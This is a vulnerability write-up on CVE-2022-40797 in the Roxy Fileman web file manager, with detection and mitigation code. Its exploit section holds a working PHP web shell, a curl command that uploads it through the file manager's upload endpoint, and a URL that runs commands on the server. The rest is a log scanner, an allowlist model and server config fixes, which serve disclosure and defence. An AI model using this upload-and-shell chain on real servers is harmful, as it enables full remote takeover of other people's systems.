If you use Roxy Fileman 1.4.6—an open-source web file manager popular among PHP developers for WYSIWYG editors like TinyMCE and CKEditor—there’s a critical vulnerability you might not know about. Discovered in late 2022, CVE-2022-40797 allows remote attackers to fully take over web servers via a clever file upload trick. This long-read post explains the bug, shows you the code, and walks you through an actual exploit scenario.
Introduction: What is Roxy Fileman?
Roxy Fileman is a file manager that lets users browse, upload, and edit files in a web application. It’s often embedded in content management systems, especially ones supporting rich text editors.
About CVE-2022-40797
CVE-2022-40797 is a critical vulnerability affecting Roxy Fileman up to version 1.4.6. An attacker can upload a malicious file and get remote code execution (RCE) on the web server—sometimes with just one HTTP request.
The Filtering Flaw
The main issue is in conf.json, the default configuration file for Roxy Fileman. Here’s the relevant snippet:
{
"FORBIDDEN_UPLOADS": ".php,.php4,.php5"
}
What’s missing: The filter does NOT block .phar files!
Why is This a Problem?
On many Apache and Nginx setups, the handler mapping that sends .php files to the PHP interpreter also covers .phar, so a .phar file requested through a URL is executed just like a .php file.
Exploiting CVE-2022-40797 Step by Step
Let’s walk through a basic exploitation proof-of-concept so you fully understand the impact.
Step 1: Create a simple PHP web shell and save it as shell.phar
<?php
// shell.phar
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
Step 2: Upload the File
Using the Roxy Fileman interface (or by directly crafting a POST request to the upload endpoint), upload shell.phar:
- Upload URL: /fileman/php/upload.php?type=files
Example using curl
curl -F "file[]=@shell.phar" https://target-site.com/fileman/php/upload.php?type=files
Step 3: Access the uploaded file
https://target-site.com/userfiles/files/shell.phar?cmd=id
If the server is vulnerable, this executes your command (id) on the target system. You’ve got a working web shell!
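From the defender's side, the sequence above leaves a recognisable trace in the web server's access log: an upload request followed by a GET for a file under the upload root whose extension PHP would execute, usually with a query string attached. The scanner below is an added example for this post, not part of Roxy Fileman; it assumes the log is in the Apache/Nginx "combined" format and that uploads live under /userfiles/ (the upload root visible in the URL above). The sample log lines are constructed.

```python
"""Scan web server access logs for requests that execute uploaded files.

Added example for this post, not part of Roxy Fileman. Assumptions: the log
is in Apache/Nginx "combined" format and uploads live under /userfiles/ (the
upload root seen in the post's exploit URL). The sample lines are constructed.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

UPLOAD_PREFIXES = ("/userfiles/",)
PHP_EXECUTABLE_EXTS = (".php", ".php4", ".php5", ".php7", ".phar", ".pht", ".phtml")

# Minimal combined-log-format parser: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (client addresses from documentation ranges)
SAMPLE_LOG = """\
198.51.100.7 - - [09/Nov/2022:07:20:01 +0000] "POST /fileman/php/upload.php?type=files HTTP/1.1" 200 57 "-" "curl/7.81.0"
198.51.100.7 - - [09/Nov/2022:07:20:05 +0000] "GET /userfiles/files/shell.phar?cmd=id HTTP/1.1" 200 311 "-" "curl/7.81.0"
203.0.113.9 - - [09/Nov/2022:07:21:10 +0000] "GET /userfiles/images/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Nov/2022:07:21:12 +0000] "GET /userfiles/files/report.pdf HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Nov/2022:07:22:30 +0000] "GET /userfiles/files/notes.phtml HTTP/1.1" 404 196 "-" "curl/7.81.0"
this line is not in combined format and is skipped
"""


@dataclass
class Finding:
    ip: str
    ts: str
    path: str
    query: str
    status: str
    reason: str


def check_line(line: str):
    """Return a Finding for a request to a PHP-executable file under the upload root, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    if not path.startswith(UPLOAD_PREFIXES) or not path.endswith(PHP_EXECUTABLE_EXTS):
        return None
    reason = "PHP-executable extension under upload root"
    if url.query:
        # A query string on an uploaded file is the tell-tale of a web shell being driven
        reason += "; query string passed to an uploaded file"
    return Finding(m.group("ip"), m.group("ts"), url.path, url.query, m.group("status"), reason)


def scan(log_text: str) -> list:
    """Scan a whole log and return findings in log order (unparseable lines are skipped)."""
    return [f for f in (check_line(line) for line in log_text.splitlines()) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.status} {f.path}?{f.query} -> {f.reason}")
```

A 404 for a .phtml under the upload root is reported as well: an attacker probing which extensions the server executes is worth seeing even when the file does not exist. Pair this with the upload endpoint's own log so a hit can be tied back to the session that uploaded the file.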
Why Does the Bypass Work?
The upload filter only rejects files with .php, .php4, and .php5 extensions. Many developers don’t realize that .phar files (PHP archive format) can contain and execute PHP code if the server isn’t explicitly configured to block them. Some PHP installations (especially with default Apache or Nginx+php-fpm setups) treat any .phar file as executable PHP. So all an attacker needs to do is upload a .phar with valid PHP code.
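To make the gap concrete, the script below models the two filtering approaches side by side: a denylist of the kind conf.json's FORBIDDEN_UPLOADS implements, and an allowlist that only admits the extensions the application actually needs. It is an added example for this post, not Roxy Fileman's code: it reproduces only the approach (compare the final extension against a comma-separated list), the allowlist and the sample filenames are constructed, and case-insensitive matching is this model's own choice. The same helper also reports which PHP-executable extensions a given FORBIDDEN_UPLOADS value leaves uncovered, which is a quick way to audit the "immediate fix" in the Mitigation section.

```python
"""Model of an extension denylist (the FORBIDDEN_UPLOADS approach) beside an allowlist.

Added example for this post; it is not Roxy Fileman's code. Only the approach of
the conf.json check is reproduced so the gap can be shown on sample filenames.
The allowlist, the sample names and the case-insensitive matching are assumptions.
"""
from __future__ import annotations
import os

# Default FORBIDDEN_UPLOADS value quoted from Roxy Fileman 1.4.6's conf.json
DEFAULT_FORBIDDEN = ".php,.php4,.php5"

# Extensions the post names as executable by PHP on common server setups
PHP_EXECUTABLE_EXTS = frozenset({".php", ".php4", ".php5", ".php7", ".phar", ".pht", ".phtml"})

# Constructed allowlist for a document/image upload use case (assumption)
ALLOWED_EXTS = frozenset({".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"})


def parse_forbidden(value: str) -> set[str]:
    """Split a FORBIDDEN_UPLOADS string into a set of lowercase extensions."""
    return {e.strip().lower() for e in value.split(",") if e.strip()}


def denylist_allows(filename: str, forbidden: str = DEFAULT_FORBIDDEN) -> bool:
    """Denylist check: reject only when the final extension is on the list.

    Anything not explicitly listed (.phar, .phtml, ...) passes, which is the flaw.
    """
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return ext not in parse_forbidden(forbidden)


def allowlist_allows(filename: str, allowed: frozenset[str] = ALLOWED_EXTS) -> bool:
    """Allowlist check: the final extension must be allowed, and no inner
    dot-separated component may be a PHP-executable extension, so a name
    like 'shell.phar.jpg' is rejected as well."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension at all, or a dotfile such as .htaccess
    if "." + parts[-1] not in allowed:
        return False
    return not any("." + p in PHP_EXECUTABLE_EXTS for p in parts[1:-1])


def missing_from_denylist(forbidden: str = DEFAULT_FORBIDDEN) -> set[str]:
    """PHP-executable extensions that a FORBIDDEN_UPLOADS value does not cover."""
    return set(PHP_EXECUTABLE_EXTS - parse_forbidden(forbidden))


if __name__ == "__main__":
    samples = ["photo.jpg", "shell.php", "shell.phar", "shell.phar.jpg", "report.final.pdf"]
    for name in samples:
        print(f"{name:18} denylist={denylist_allows(name)!s:5} allowlist={allowlist_allows(name)}")
    print("default list misses:", sorted(missing_from_denylist()))
    print("'.phar added' list misses:", sorted(missing_from_denylist(".php,.php4,.php5,.phar")))
```

Run against the default value, missing_from_denylist reports .phar, .pht, .php7 and .phtml; against the list with .phar appended it still reports .pht, .php7 and .phtml. That is the practical argument for an allowlist: the denylist is only as good as the next extension somebody remembers to add, whereas the allowlist fails closed.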
Official Disclosure & References
- NVD entry for CVE-2022-40797
- Roxy Fileman GitHub
- Exploit Database: CVE-2022-40797
Mitigation
Immediate fix:
Explicitly block .phar (and any other PHP-related extensions) in your conf.json:
{
"FORBIDDEN_UPLOADS": ".php,.php4,.php5,.phar"
}
Better solution:
- Upgrade to a version where the patch is applied (check the official repo).
For Apache (scope this to the upload directory, for example in a .htaccess file under userfiles or in a <Directory> block for it; applied server-wide it also blocks the application's own PHP files. Deny from all is Apache 2.2 syntax; on 2.4 it needs mod_access_compat, and the native form is Require all denied.)
<FilesMatch "\.(php|php4|php5|phar)$">
Deny from all
</FilesMatch>
For Nginx (nest this inside a location block for the upload directory; a server-wide regex location would also deny the application's own scripts, including the upload.php endpoint.)
location ~* \.(php|php4|php5|phar)$ {
deny all;
}
Final Thoughts
CVE-2022-40797 is a striking reminder: security isn’t just about the obvious extensions. Attackers look for *any* way to execute code. If you use Roxy Fileman (or any PHP file manager), update your upload filters and your server config.
Stay safe!
Exclusive insight:
Even after you add .phar to FORBIDDEN_UPLOADS, watch out for other tricky PHP extensions (.pht, .php7, .phtml). Always check your server’s executable file mapping and strictly control what file types you accept.
Need more help?
- How to Secure File Uploads in PHP
- More about PHP file handling and dangerous extensions
Have you checked your FORBIDDEN_UPLOADS lately?
Don’t wait until it’s too late and patch this bug now!
Timeline
Published on: 11/09/2022 07:15:00 UTC
Last modified on: 01/31/2023 17:42:00 UTC